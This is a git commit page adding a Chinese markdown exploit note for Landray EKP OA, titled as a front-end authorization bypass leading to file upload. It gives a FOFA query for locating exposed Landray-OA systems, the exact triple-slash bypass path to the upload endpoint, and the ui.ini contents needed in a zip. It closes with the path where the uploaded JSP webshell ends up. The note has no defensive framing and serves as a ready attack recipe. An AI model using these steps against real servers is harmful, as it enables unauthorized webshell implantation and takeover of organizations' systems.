Create 蓝凌EKP前台授权绕过导致文件上传.md
This commit is contained in:
parent
8ceccb96e4
commit
eddef063cc
30
蓝凌EKP前台授权绕过导致文件上传.md
Normal file
30
蓝凌EKP前台授权绕过导致文件上传.md
Normal file
@ -0,0 +1,30 @@
|
||||
|
||||
## 蓝凌EKP前台授权绕过导致文件上传
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="Landray-OA系统"
|
||||
```
|
||||
|
||||
访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。
|
||||
|
||||
## poc
|
||||
```
|
||||
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
|
||||
|
||||
```
|
||||

|
||||
|
||||
|
||||
## 文件上传
|
||||
然后上传zip包需要有ui.ini文件内容如下
|
||||
```
|
||||
id=ZzzZname=testthumb=test
|
||||
|
||||
```
|
||||

|
||||
|
||||

|
||||
|
||||
马会在/resource/ui-ext/ZzzZ/jmdyy.jsp
|
||||
Loading…
x
Reference in New Issue
Block a user